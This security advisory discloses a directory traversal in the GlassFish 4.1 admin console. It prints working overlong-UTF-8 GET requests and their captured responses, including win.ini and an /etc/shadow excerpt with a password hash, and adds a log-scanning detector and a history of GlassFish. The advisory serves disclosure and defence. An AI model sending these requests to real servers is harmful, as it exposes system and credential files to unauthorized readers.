Trustwave SpiderLabs Security Advisory TWSL2015-016:
Path Traversal in Oracle GlassFish Server Open Source Edition

Published: 08/27/2015
Version: 1.0

Vendor: Oracle Corporation (Project sponsored by Oracle)
Product: GlassFish Server Open Source Edition
Version affected: 4.1 and prior versions

Product description:
Built using the GlassFish Server Open Source Edition, Oracle GlassFish Server delivers a flexible, lightweight and extensible Java EE 6 platform. It provides a small footprint, fully featured Java EE application server that is completely supported for commercial deployment and is available as a standalone offering.

The Administration Console of Oracle GlassFish Server, which listens by default on port 4848/TCP, is prone to a directory traversal vulnerability. This vulnerability can be exploited by authenticated remote attackers to read sensitive files on the server.

Finding 1: Directory traversal
Credit: Piotr Karolak of Trustwave's SpiderLabs

#Proof of Concept on Microsoft Windows installation

The authenticated directory traversal vulnerability can be exploited by issuing a specially crafted HTTP GET request that uses a simple URL-encoding bypass: %C0%2F in place of the slash (/). The requests below use the overlong UTF-8 form %c0%af, which a lenient decoder accepts as a slash even though it is not valid UTF-8.
Example:

REQUEST
========
GET /theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini
GET /theme/META-INF/json%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini
GET /theme/META-INF/dojo%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini
GET /theme/META-INF%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini
GET /theme/com/sun%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini
GET /theme/com%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini
Cookie: JSESSIONID=5c47a3575077b014449e17877a0c
Accept-Language: en-US
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://a.b.c.d:4848/
Host: a.b.c.d:4848

RESPONSE
========
HTTP/1.1 200 OK
Server: GlassFish Server Open Source Edition 4.1
X-Powered-By: Servlet/3.1 JSP/2.3 (GlassFish Server Open Source Edition 4.1 Java/Oracle Corporation/1.8)
Last-Modified: Mon, 12 Jan 2015 10:00:00 GMT
Transfer-Encoding: chunked

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
CMCDLLNAME32=mapi32.dll
CMC=1
MAPIX=1
MAPIXVER=
OLEMessaging=1
[MCI Extensions.BAK]
3g2=MPEGVideo
3gp=MPEGVideo
3gp2=MPEGVideo
3gpp=MPEGVideo
aac=MPEGVideo
adt=MPEGVideo
adts=MPEGVideo
m2t=MPEGVideo
m2ts=MPEGVideo
m2v=MPEGVideo
m4a=MPEGVideo
m4v=MPEGVideo
mod=MPEGVideo
mov=MPEGVideo
mp4=MPEGVideo
mp4v=MPEGVideo
mts=MPEGVideo
ts=MPEGVideo
tts=MPEGVideo

The response contains the contents of the "win.ini" file, proving that the server allows remote users to download the contents of system files.
#Proof of Concept on Linux installation

Example:

REQUEST
=======
GET /theme/META-INF/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc%c0%afshadow/
GET /theme/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc%c0%afshadow HTTP/1.1
Host: a.b.c.d:4848
Accept: */*
Accept-Language: en
Connection: close

RESPONSE
========
HTTP/1.1 200 OK
Server: GlassFish Server Open Source Edition 4.1
X-Powered-By: Servlet/3.1 JSP/2.3 (GlassFish Server Open Source Edition 4.1 Java/Oracle Corporation/1.7)
Last-Modified: Tue, 13 Jan 2015 10:00:00 GMT
Date: Tue, 10 Jan 2015 10:00:00 GMT
Connection: close
Content-Length: 1087

root:!:16436:0:99999:7:::
daemon:*:16273:0:99999:7:::
bin:*:16273:0:99999:7:::
sys:*:16273:0:99999:7:::
sync:*:16273:0:99999:7:::
TRUNCATED
lightdm:*:16273:0:99999:7:::
colord:*:16273:0:99999:7:::
hplip:*:16273:0:99999:7:::
pulse:*:16273:0:99999:7:::
test:$1$Duuk9PXN$IzWNTK/hPfl2jzhHmnrVL.:16436:0:99999:7:::
smmta:*:16436:0:99999:7:::
smmsp:*:16436:0:99999:7:::
mysql:!:16436:0:99999:7:::

Vendor Response:
"We plan to fix this issue in the next major GlassFish Server Open Source Edition release."

Remediation Steps:
No fix is available at this time for the GlassFish Server Open Source Edition release. However, this vulnerability can be mitigated with the use of technologies such as Web Application Firewalls (WAF) or Intrusion Prevention Systems (IPS). Please note that Oracle GlassFish Server 3.x, which is the current commercial release of GlassFish, is not affected.
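The mitigation above relies on a WAF or IPS recognising the overlong-UTF-8 traversal before it reaches the Administration Console. The following is an added example, not code from the Trustwave advisory or the GlassFish project, of the check such a filter (or a log-review script) needs: it percent-decodes each request target, flags bytes that a strict UTF-8 decoder rejects (the %c0%af / %c0%ae forms from the proofs of concept are exactly such bytes), and separately folds those overlong forms the way a lenient decoder would so that the resulting path can be tested for escaping the document root. The access-log lines and the Combined-Log-style format are constructed for the example; the function and field names are the example's own.

```python
"""Detect path-traversal attempts that use overlong UTF-8 percent-encodings
(%c0%af for '/', %c0%ae for '.') in web-server access-log request lines.

Added example for this advisory; it is not Trustwave's or GlassFish's code.
The log lines are constructed, and the log format is assumed to be
Combined Log Format style with the request line in double quotes.
"""
import re
from urllib.parse import unquote_to_bytes

# Constructed sample access-log lines (not real traffic). Lines 1 and 3 use
# the encoding shown in the advisory; line 5 is a plain-ASCII traversal
# attempt that the server rejected; lines 2 and 4 are benign.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Jan/2015:10:00:00 +0000] "GET /theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini HTTP/1.1" 200 1087
10.0.0.6 - - [12/Jan/2015:10:00:01 +0000] "GET /theme/com/sun/webui/jsf/suntheme/css/css_master.css HTTP/1.1" 200 53422
10.0.0.7 - - [12/Jan/2015:10:00:02 +0000] "GET /theme/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc%c0%afshadow HTTP/1.1" 200 1087
10.0.0.8 - - [12/Jan/2015:10:00:03 +0000] "GET /management/domain/version HTTP/1.1" 200 512
10.0.0.9 - - [12/Jan/2015:10:00:04 +0000] "GET /theme/META-INF/../../../../etc/passwd HTTP/1.1" 404 0
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d"')


def fold_overlong(raw: bytes) -> bytes:
    """Mimic a lenient decoder that accepts two-byte overlong forms (lead byte
    0xC0 or 0xC1) and folds them to the ASCII byte they encode. A strict
    decoder rejects these; the lenient behaviour is reproduced here only to
    compute the path a vulnerable component would have acted on."""
    out = bytearray()
    i = 0
    while i < len(raw):
        lead = raw[i]
        if lead in (0xC0, 0xC1) and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
            out.append(((lead & 0x1F) << 6) | (raw[i + 1] & 0x3F))
            i += 2
        else:
            out.append(lead)
            i += 1
    return bytes(out)


def escapes_root(path: str) -> bool:
    """Resolve '.' and '..' segments; True if the path climbs above '/'."""
    depth = 0
    for seg in path.split('/'):
        if seg in ('', '.'):
            continue
        if seg == '..':
            depth -= 1
            if depth < 0:
                return True
        else:
            depth += 1
    return False


def analyze_target(target: str) -> dict:
    """Classify one request target using two independent signals:
    - the percent-decoded bytes are not valid UTF-8 under a strict decoder,
      which is how overlong forms look to a conforming implementation;
    - after lenient folding, the normalised path escapes the document root."""
    raw = unquote_to_bytes(target.split('?', 1)[0])
    reasons = []
    try:
        raw.decode('utf-8')          # strict: rejects 0xC0/0xC1 lead bytes
    except UnicodeDecodeError:
        reasons.append('invalid-or-overlong-utf8')
    effective = fold_overlong(raw).decode('utf-8', errors='replace')
    if escapes_root(effective):
        reasons.append('traversal-escapes-root')
    return {'target': target, 'effective_path': effective, 'reasons': reasons}


def scan_log(text: str) -> list:
    """Return one finding per request line that triggers at least one signal."""
    findings = []
    for line in text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        result = analyze_target(match.group('target'))
        if result['reasons']:
            result['client'] = line.split(' ', 1)[0]
            findings.append(result)
    return findings


if __name__ == '__main__':
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['client']}: {', '.join(f['reasons'])} -> {f['effective_path']}")
```

The two signals are deliberately separate. Matching the literal string `%c0%af` would miss case variants and other overlong lengths, whereas rejecting anything a strict UTF-8 decoder refuses covers all of them and is the same rule a fixed server should apply before path normalisation. The lenient fold is there so the analyst can see the path the request resolved to, which is what distinguishes a blocked probe from a successful read such as the 200 responses in the advisory.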
Revision History:
01/12/2015 - Vulnerability disclosed to vendor
02/18/2015 - Notified vendor about the updates to TW security policy
05/19/2015 - Ninety-day deadline exceeded
07/14/2015 - Requested status from vendor
07/31/2015 - Requested status from vendor
08/21/2015 - Notified vendor about public disclosure
08/27/2015 - Advisory published

About Trustwave:
Trustwave helps businesses fight cybercrime, protect data and reduce security risks. With cloud and managed security services, integrated technologies and a team of security experts, ethical hackers and researchers, Trustwave enables businesses to transform the way they manage their information security and compliance programs while safely embracing business imperatives including big data, BYOD and social media. More than 2.5 million businesses are enrolled in the Trustwave TrustKeeper® cloud platform, through which Trustwave delivers automated, efficient and cost-effective data protection, risk management and threat intelligence. Trustwave is a privately held company, headquartered in Chicago, with customers in 96 countries. For more information about Trustwave, visit

About Trustwave SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services.

Disclaimer:
The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose.
In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. 

Application server project

GlassFish is an open-source Jakarta EE platform application server project started by Sun Microsystems, then sponsored by Oracle Corporation, and now living at the Eclipse Foundation and supported by Payara, Oracle and Red Hat.[2] The supported version under Oracle was called Oracle GlassFish Server. GlassFish is free software and was initially dual-licensed under two free software licences: the Common Development and Distribution License (CDDL) and the GNU General Public License (GPL) with the Classpath exception. After having been transferred to Eclipse, GlassFish remained dual-licensed, but the CDDL license was replaced by the Eclipse Public License (EPL).[3]





GlassFish is the Eclipse implementation of Jakarta EE (formerly the reference implementation from Oracle) and as such supports EJB, JPA, JSF, JMS, RMI, JSP, servlets, etc. This allows developers to create enterprise applications that are portable and scalable, and that integrate with legacy technologies. Optional components can also be installed for additional services.

Built on a modular kernel powered by OSGi, GlassFish runs straight on top of the Apache Felix implementation. It also runs with Equinox OSGi or Knopflerfish OSGi runtimes. HK2 abstracts the OSGi module system to provide components, which can also be viewed as services. Such services can be discovered and injected at runtime.

GlassFish is based on source code released by Sun and Oracle Corporation’s TopLink persistence system. It uses a derivative of Apache Tomcat as the servlet container for serving web content, with an added component called Grizzly which uses Java non-blocking I/O (NIO) for scalability and speed.





In October 2003, Sun Microsystems released Sun ONE Application Server 7,[4][5] which supports the J2EE 1.3 specification. It is based on the iPlanet Web Server and the J2EE reference implementation.[6] A basic version is free to download, but not open source.

In March 2004, Sun Microsystems released Sun Java System Application Server 8,[7] which supports the J2EE 1.4 specification. Update 1 was released in June 2004.[8] A basic version is free to download, but not open source.

On 8 February 2005, Sun Microsystems released Sun Java System Application Server 8.1 that supports the J2EE 1.4 specification. This version introduced a major update to web services security (a precursor to the later JASPIC and Jakarta Authentication), Admin Console GUI enhancements, JavaServer Faces 1.1 Support (at this point not yet part of J2EE), performance enhancements, and support for Java SE 5.0.[9] A basic version is free to download, but not open source.

Sun Microsystems launched the GlassFish project on 6 June 2005 by publishing the vetted source of Sun Java System Application Server.[10][11] Builds of this early version identify themselves in the log as “sun-appserver-pe9.0”.[12]

On 31 January 2006, Sun Microsystems released Sun Java System Application Server 8.2.[13] This version introduced bundling of the Derby database and Fast Infoset for web services.[14] A basic version is free to download, but not open source.

On 4 May 2006, Project GlassFish released the 1.0 version (a.k.a. Sun Java System Application Server 9.0) that supports the Java EE 5 specification.

On 15 May 2006, Sun Java System Application Server 9.0, derived from GlassFish 1.0, was released.[15]

On 8 May 2007 Project SailFin was announced at JavaOne as a sub-project under Project GlassFish. Project SailFin aims to add Session Initiation Protocol (SIP) servlet functionality to GlassFish.[16]

On 17 September 2007, the GlassFish community released version 2.0 (a.k.a. Sun Java System Application Server 9.1) with full enterprise clustering capabilities and Microsoft-interoperable web services.

On 21 January 2009, Sun Microsystems and the community released GlassFish 2.1 (a.k.a. Sun GlassFish Enterprise Server 2.1), which serves as the basis for SailFin 1.0 (a.k.a. Sun Communication Application Server 1.0).

SailFin 2.0 (a.k.a. Sun Communication Application Server 2.0), released on 28 October 2009, leverages GlassFish 2.1.1 (a.k.a. Sun GlassFish Enterprise Server 2.1.1) and adds a number of features including high availability, rolling upgrade, flexible network topology, better overload protection, Diameter support, improved diagnosability, Java-based DCR files for the load balancer, and more.

On 10 December 2009 GlassFish 3.0 (a.k.a. Sun GlassFish Enterprise Server 3.0) was released. Being the Java EE reference implementation, this was the first application server to completely implement Java EE 6 JSR 316. JSR 316 was however approved with reservations.[17] In this version GlassFish adds new features to ease migration from Tomcat to GlassFish.[18] The other main new features are around modularity (GlassFish v3 Prelude already shipped with an Apache Felix OSGi runtime), startup time (a few seconds), deploy-on-change (provided by NetBeans and Eclipse plugins), and session preservation across redeployments.[19]

On 25 March 2010, soon after the acquisition of Sun Microsystems, Oracle issued a Roadmap for versions 3.0.1, 3.1, 3.2 and 4.0 with themes revolving around clustering, virtualization and integration with Coherence and other Oracle technologies. The open source community remains otherwise unaffected.

On 28 February 2011, Oracle Corporation released GlassFish 3.1. This version introduced support for ssh-based provisioning, centralized admin, clustering and load-balancing. It maintains its support for both the Web Profile and full Java EE 6 Platform specifications.

On 28 July 2011, Oracle Corporation released GlassFish 3.1.1. This is a fix release for GlassFish 3.1 with multiple component updates (Weld, Mojarra, Jersey, EclipseLink, …), JDK 7 support, AIX support and more.

On 29 February 2012, Oracle Corporation released GlassFish 3.1.2. This release includes bug fixes and new features including administration console enhancements, transaction recovery from a database and new thread pool properties.

On 17 July 2012, Oracle Corporation released GlassFish This is a “micro” release to address some exceptional issues in the product.[20]

On 12 June 2013, Oracle Corporation released GlassFish 4.0. This major release brings Java Platform, Enterprise Edition 7 support.[21]

On 9 September 2014, Oracle Corporation released GlassFish 4.1. This release includes many bug fixes (over a thousand) and the latest MR releases of CDI and WebSockets.[22]

On 7 October 2015, Oracle Corporation released GlassFish 4.1.1. This release includes many bug fixes and security fixes as well as updates to many underlying components.[23]

On 31 March 2017, Oracle Corporation released GlassFish 4.1.2. This release includes bug fixes.[24]

On 21 September 2017, Oracle Corporation released GlassFish 5.0. This release is the Java EE 8 open source reference implementation; the Java EE 8 umbrella specification and all the underlying specifications (JAX-RS 2.1, Servlet 4.0, CDI 2.0, JSON-B 1.0, Bean Validation 2.0, etc.) were finalized and approved.[25]

On 29 January 2019, the Eclipse Foundation released GlassFish 5.1. This release is technically identical to Oracle’s GlassFish 5.0 but is fully built from the source code that Oracle transferred to the Eclipse Foundation and which was subsequently relicensed to EPL. Like GlassFish 5.0, 5.1 is Java EE 8 certified, but does not have any RI status. The main goal of this release is to prove that all source code has been transferred and can indeed be built into a fully compliant product.[26]

On 31 December 2020, the Eclipse Foundation released GlassFish 6.0.0. This version is functionally largely identical to GlassFish 5.1 but implements Jakarta EE 9.[27] Jakarta EE 9 is functionally identical to Jakarta EE 8 (which is functionally identical to Java EE 8) but has its packages and various constants changed from javax.* to jakarta.*.

On 5 May 2021, the Eclipse Foundation released GlassFish 6.1.0. This version is functionally identical to GlassFish 6.0.0 but implements Jakarta EE 9.1. Jakarta EE 9.1 is functionally identical to Jakarta EE 9 (which is functionally identical to Jakarta EE 8 and Java EE 8) but adds support for JDK 11. In the months after, 6.2.0, containing Jakarta MVC, and the JDK 17-compatible 6.2.1, containing Eclipse Exousia, were released.

Roadmap and end of Oracle commercial support




The commercially supported version of GlassFish was known as Oracle GlassFish Server,[28] formerly Sun GlassFish Enterprise Server, and previously Sun Java System Application Server (SJSAS); it has a history, along with other iPlanet software, going back to Netscape Application Server. This includes code from other companies, such as Oracle Corporation for TopLink Essentials. Ericsson’s SIP Servlet support is included; the open-source version of it is SailFin, developing towards JSR-289.[29] In 2010, the difference between the commercial and open source editions was already quite small.[29]

On 4 November 2013, Oracle announced the future roadmap for Java EE and GlassFish Server, with a 4.1 open-source edition planned and continuing open-source updates to GlassFish, but with an end to commercial Oracle support.[30][31] Commercial customers have instead been encouraged to transition to Oracle’s alternative product, Oracle WebLogic Server.

In response to Oracle’s announcement to end commercial support for GlassFish, a fork called Payara Server was created and released in October 2014. Payara Server is open source under the same licenses as GlassFish, but has optional commercial support.

Open-source GlassFish continued under Oracle until version 5.0 (the reference implementation for Java EE 8), after which the source code was donated to the Eclipse Foundation,[32] which released the technically identical but relicensed version 5.1.[26] At Eclipse, Payara is leading the GlassFish project, with support from Oracle and Red Hat.[2]

A GlassFish 5.2 release was planned as a Jakarta EE 8 compatible implementation, but was never released. Jakarta EE 8 is functionally identical to Java EE 8, but was created via the Eclipse Foundation Specification Process (EFSP).[33]
